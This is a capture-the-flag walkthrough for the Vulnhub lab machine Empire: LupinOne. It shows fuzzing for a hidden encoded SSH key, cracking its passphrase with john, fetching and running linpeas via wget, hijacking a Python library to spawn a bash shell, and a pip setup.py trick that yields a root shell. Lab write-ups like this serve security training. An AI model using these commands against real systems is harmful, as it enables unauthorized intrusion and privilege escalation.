# Empire: LupinOne Vulnhub WriteUp

<figure><img src="https://1680260334-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fuyv6WKxbnPSm2zlRacJi%2Fuploads%2FSc8d41hJHGrVeYoeTwsd%2Fimage.png?alt=media&#x26;token=628ec84e-b9ea-45a9-a51d-681839048ca1" alt=""><figcaption><p>Every lab, every wallpaper</p></figcaption></figure>

Empire: LupinOne is a Vulnhub easy-medium machine designed by icex64 and Empire Cybersecurity. This lab is appropriate for seasoned CTF players who want to put their skills to the test.

### Download

* **01-Empire-Lupin-One.zip** (Size: 922 MB)
* **Download (Mirror)**: <https://download.vulnhub.com/empire/01-Empire-Lupin-One.zip>

### Pentesting Methodology

**Network Scanning**

* netdiscover
* nmap

**Enumeration**

* abusing HTTP
* fuzzing

**Exploitation**

* john
* ssh

**Privilege Escalation**

* linpeas
* python library hijacking
* pip
* root flag

**Level: Easy-Medium**

### Network Scanning

To begin, we must use the netdiscover command to scan the network for the IP address of the victim machine.

To move forward in this process, we are launching Nmap.

```bash
nmap -sC -sV 192.168.1.2
```

We have, according to the nmap output:

* on port 22 there is an SSH server.
* an HTTP service (Apache Server) running on port 80, as well as a **/\~myfiles**

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEghBsP84_4xLRFQPdgiP6oO24gZ_1IR7PMzfcsRrITiADV56Gfup6xmiXSe-se5HEuoQ4nf5I5RpFQalh4YyAAZ0E7oYKTZMBi0rhwYCNDxJV4WOWI4NW1zCMvwxfHc9Jb_1T6QAjVJm8eqByS2DcK-aqAf0-HKuRpTgga8UvSUCGkAraCU7rpunLdZTQ=s16000" alt=""><figcaption></figcaption></figure>

### Enumeration

We began the enumeration procedure by inspecting the **(/\~myfiles)** HTTP page. Discovered an Error 404, which seemed suspicious.

```shell
http://192.168.1.2/~myfiles/
```

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEhLH5sXCFOBNeJHgBJ1IDqH2OkfEhgvDFHcMSzswAgFMGG0K3Id-lUuF6wW0dJ77D7-GmFh-IOu8fVGnXuggRGIXWPsj7HEBhofU-ECTJKeQuGTAMBMKAQNw_9BEnJqCMq8w8AlhUdLwksXMzH6A4jO9lXeKhMk4EhHDLCqJQWOKuZiNNl6R4sZSCpxqA=s16000" alt=""><figcaption></figcaption></figure>

We looked at the view page source and found comment “you can do it, keep trying”.

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEhm6WdtreqzMmhBFuD-dtE9w_Iy6dysF3CBgsoY3jThLS7WAVaMV5C1dXAXbZY8-15m_4tpM7Bpr9QaNQC6AMHoR6RvjqdrGFAGBI4XN1AbVVo98pTwkQYt6WRGl0HmkVcrbPPo2bBtNaKams6iixIAesyheb37eOUfn1T6VMalL516NSKp2jhioHTBNQ=s16000" alt=""><figcaption></figcaption></figure>

As a result, we use fuzzing to gain some additional information from this case. We made use of **ffuf** and we obtained a directory (**secret**).

{% code overflow="wrap" lineNumbers="true" %}

```bash
ffuf -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -u 'http://192.168.1.2/~FUZZ'
```

{% endcode %}

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEjZ6f7qCjVe9e0Iu-wk4oyPAf7M1z5mLsRpHoYLeMr5bvcZQ9RsqbNIM1KtqBtpdbIr3xVN3yezqeqSs6MtEgWBI7YI_R9CqFXxsYCXpoCZPXNv7Z9Yk9RnEB1l9-FGUJ3egsymxYxDLBq96Xg82Vorm0EKbmi-8bgw6CyCemDrD0oSH5kBwdPMhbSpMQ=s16000" alt=""><figcaption></figcaption></figure>

Take a good look at that secret directory and analyses that here author is sharing some information related to SSH private key file related to user “icex64” that we need to fuzz.

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEhwupkQdJHLd8xUCJJoRFZmijoRNwKZ9yKGILmhp3SMxS3uLODDooGt1E-LbenubOt0xpQxJiLS6bDbzadlyn2KE_kNqsjIJGMmDPD0R5U96ff2PaVNfmErzqgnewblm2eG6SeHxLqaRZ93KuadSoiOzHtcQklK23TyDwZRccjCWZqX6uGtZEMSGbblSQ=s16000" alt=""><figcaption></figcaption></figure>

To find that secret private ssh key, we again use fuzzing with the help of ffuf once more and found text file (**mysecret.txt**).

{% code overflow="wrap" lineNumbers="true" %}

```shell
ffuf -c -ic -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u 'http://192.168.1.2/~secret/.FUZZ' -fc 403 -e .txt,.html
```

{% endcode %}

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEi5QbA5G3b6uOm9Ju_dfUZqgHd4c-U_-anbrMPMZ1bUbfSgiRLNaiGOuPovaYoCP9DONRdykY0QcCsNMLrh9aFlOHO6c9L0EcIdvyCyfUTkxKOePVw9330JbwtRxjMrpzqzpBOvOc9oLPVa9DaeiUTFisf7tu01IDM04OpwUezDEOYEhazqttnoSGke3w=s16000" alt=""><figcaption></figcaption></figure>

We explore mysecret.txt with a web browser. It appears to be a **private ssh key**, but it is encoded. We thoroughly examined this key and discovered that it is encoded in **base 58**.

```shell
http://192.168.1.2./~secret/.mysecret.txt
```

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEg84s0NAW0DGep_GZ2JJJvPapD-bmiPfHN8kTqqXh_wAmQGvRDQeII8qZoPqxx8mhWAuzXCVUo1jofUynz5ycgCtNxTpXZM20ym3kQHfzGSif0GGQRoVcYdkpyRzMwJeT57U_JOi5JsAV6DVpmQPTILVtexiNoemQnGkaDTZo4Yy7fUI0LozCXc-iM5zg=s16000" alt=""><figcaption></figcaption></figure>

We looked up a base 58 decoder online and were met with [browserling](https://www.browserling.com/tools/base58-decode). It is the most basic online base-58 decoder for web developers and programmers.

Simply enter your data in the form below, click the Base-58 Decode button, and you’ll be presented with a base-58 encoded string. We obtained our **ssh-key** after decoding it.

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEirLSLPT-MiFXVXnIT8_s8Gu2UFPds70YN2EK9G_VubFyxEjZlBAZ88eMW42NEJOjgv2Qli4P0ZX646gpwAq-VdHCEJ4JoIIFOqG3zLSVlGBLqpUDZOAVJMut_jOrZeVkty6qMC1y-GHXMWefCT92Ac_GhpQXz7nhhBdTj2Ahk2aPytPxzz-VtrD_vPNw=s16000" alt=""><figcaption></figcaption></figure>

### Exploitation

Since the author has share some hint related to passphrase for SSH Key, thus we are using ssh2john to obtain the hash value of the ssh-key.

{% code lineNumbers="true" %}

```shell
locate ssh2john
/usr/share/john/ssh2john.py sshkey > hash
```

{% endcode %}

Now, use john to crack the hash value.

```shell
john --wordlist=/usr/share/wordlists/fastrack.txt hash
```

In a few seconds, Bingo!! We obtained the ssh-key password (**P\@55w0rd!**).

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEijOCVSJJBUX0zThR9vVWf-CHaLS2IDwCbNxV1_TGmJZxtZ9o-iUO5jm335xNU_L4-IO6SLgp3B6-8x7NJ3SGm8ZQZvJIevj3mKJfUi7MxViUegItw48yvk-hGgmvJEfc-zAvwBglI1WhPyW9nQRPiWTyjl9yxO9F0T9b5SNuLyieUV_gDZPAxm1deJQA=s16000" alt=""><figcaption></figcaption></figure>

We have all of the requirements for ssh login. Use our icex64 username, ssh-key, and cracked password (**P\@55w0rd!**).

```shell
ssh -i sshkey icex64@192.168.1.2
```

Bang!! We used the **icex64** user to connect to ssh. We promptly verified this user’s access and discovered that a Python file was running. We promptly examined that file and discovered that it could be exploited using the **Python Library Hijacking** approach.

{% code lineNumbers="true" %}

```shell
sudo -l
cat /home/arsene/heist.py
```

{% endcode %}

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEhBSCBNa0u9PentMJ8Pbp5k7XFzZRgb8GaiT0aurTrnrYY5udON_5DM6jhif3PVblPaNOXLmSnY4YEvhbuVQHloZx2jiWjeq8ml5C9p_it9hR9A2XxXUT-owiZ48T7pgvG59c7twyyW0TO29wwQ5bljWj_IGK8OV4rjouvcI_aUkkKHUgEtxG8Ax0kl-A=s16000" alt=""><figcaption></figcaption></figure>

### Privilege Escalation

We’ve started the process of escalating privileges. To begin with the Python Library Hijacking technique, we must first determine the coordinates of webbrowser.py. That’s why we’re employing the **linpeas** script.

We’ve previously downloaded the Linpeas script from git [page](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS). Now we just navigate to that directory and launch a basic Python http server.

```shell
python -m SimpleHTTPServer 80
```

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEh4BQ2VQiDgk_lKM7b3S5thy9Z01nEia3j2cJIBpV58zUyvnJEbzhs9CZSgTAnsDz3V8sZZdtKWQBkehmzqh3W2xSVVXV_eyxTCjmWcOTw-WZx1AxUXJ30one7QR_kC4LUG4NEJuPMSH4KB17Q1g5i9f8ot8nidaxFqpubrdhnTpwxeGeY6rgpCVivqNQ=s16000" alt=""><figcaption></figcaption></figure>

Now we’ll switch to the icex64 terminal. We moved the directory to /tmp directory and imported the Linpeas script from Kali Linux using the wget function.

{% code lineNumbers="true" %}

```shell
cd /tmp
wget 192.168.1.3/linpeas.sh
```

{% endcode %}

Then we granted the script the ALL permissions. Then we ran it right away.

{% code lineNumbers="true" %}

```shell
chmod 777 linpeas.sh
./linpeas.sh
```

{% endcode %}

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEiZQlBdUI6gxnU7VILl5Phw-avfYYgRqCZO0pYa1wDHpL_2Lk2CaAc49wRhXgonvbqDYIL-y3CZNqWmAKxHocWyYBmxYrFQpaGIuPJyXFDz1gio-5Mqi4Nxu64aey_0eq32iRcpdoNHwx1nyWxzPnfA1UNwe_JcOibNsZaw62t-NcISiAieqPUVWtvjdg=s16000" alt=""><figcaption></figcaption></figure>

We obtained the location of the Python file in a matter of seconds (**webbrowser.py**).

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEjXziEp5PBGXxWN_J-9E0TiFtYpBemHQsTCLgM86YOHKSGDLuarVj54lHDJrPHE7QymmDlTDDs7-1mYO1leBzd8Zm2cYioY6raHKDIBpxb3b632VvGcvXXbHaEvt_xhsOgzRtSQxpUmzhmQGqnK8fx1IwX4sYQQTE4x8w5D_cyhex7EDkCC33CiYXDfwA=s16000" alt=""><figcaption></figcaption></figure>

We can now begin our Python Library Hijacking procedure where an attacker is introduced into a python-enabled environment, you can learn more about this strategy by clicking [here](https://www.hackingarticles.in/linux-privilege-escalation-python-library-hijacking/).

To operate this python file, we utilised the nano command and edit the script to call /bin/bash code into it.

```shell
os.system ("/bin/bash")
```

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEhWkjkHox5l5yd_Zqt2Sl3_TSbEVxr79z8AFGanQ8TOEuL47SZw6u1ZBIRBsfdkTgjFHcN7MKen2SAWX6h4BXvIZntIsh8ShuITk5zwmWN5MQg40Xqvi8PlW4mvqH7vHl5ily8_4GSzvFJkXgDA8BqzJE5D2O1uizwc_My8cripa58ZpLj42RHMyh3YHg=s16000" alt=""><figcaption></figcaption></figure>

After all of this effort, we ran the sudo command in conjunction with the coordinates specified in the permissions check on icex64. To switch the user **icex64** to **arsene**.

```shell
sudo -u arsene /usr/bin/python3.9 /home/arsene/heist.py
```

We got the user **arsene** and checked this user SUDO permissions and found user has privilege to execute pip binary as root without atuthentication. We have an idea to do **pip** privilege escalation after evaluating a few more moments.

```shell
sudo -l
```

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEgvklUoad4JLXkXs14AoNBGI3Aswm0o-ZDYHuYXJRHJT90AMeyBkLS58O07ycTkzjTciLZ9CHnv4sQbMNAOMKH7vzQ1BKE2UBhhLZgelYLwqkRspcKv8ZfTwwvTH7Hk1bqfKyqRgh0aJL2khTuc3VwV5lSJFk5tUZ5_PlOEK3DUuI9v8p7zby5sbID9Xg=s16000" alt=""><figcaption></figcaption></figure>

We used the gtfobin instructions provided [here ](https://gtfobins.github.io/gtfobins/pip/)to conduct pip privilege escalation. If the programme is allowed to run as superuser by sudo, it retains its elevated rights and can be used to access the file system, escalate, or keep privileged access.

To conduct pip privilege escalation, we only need to run these three commands.

{% code overflow="wrap" lineNumbers="true" %}

```shell
TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo pip install $TF
```

{% endcode %}

Yippee!! Finally, we have the root; simply use the id command to check. It has been proven that it is root; simply change the directory to root. Congo!! We obtained the root flag.

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEhlfEyBcD3Gw2y6qRNfp0GXBB40IpRAYpbLcK9zEYNeEgFSdZ4wNf3sQemPL4UFMedkZyXYKY5Z3XaREzYCAAxXzT-8CinoiokZsvJLY4A2qd3uD53euSQmU8Z1QRehpRMtsC2YpALZ0FEixOFUWOcqYA1ZEZVZyzGGBJsywyo5f5CT3no53Qb9I7EUfA=s16000" alt=""><figcaption></figcaption></figure>

This is how we’ll get at the machine’s shell. It was a terrific exercise, and it was a lot of fun to cheer for the winners. To comprehend many scenarios, it is required to try once.

**Author**: Eopi Noriko is a passionate Cybersecurity Researcher, contact [Facebook](https://www.facebook.com/Thuong.EoPi/).

<br>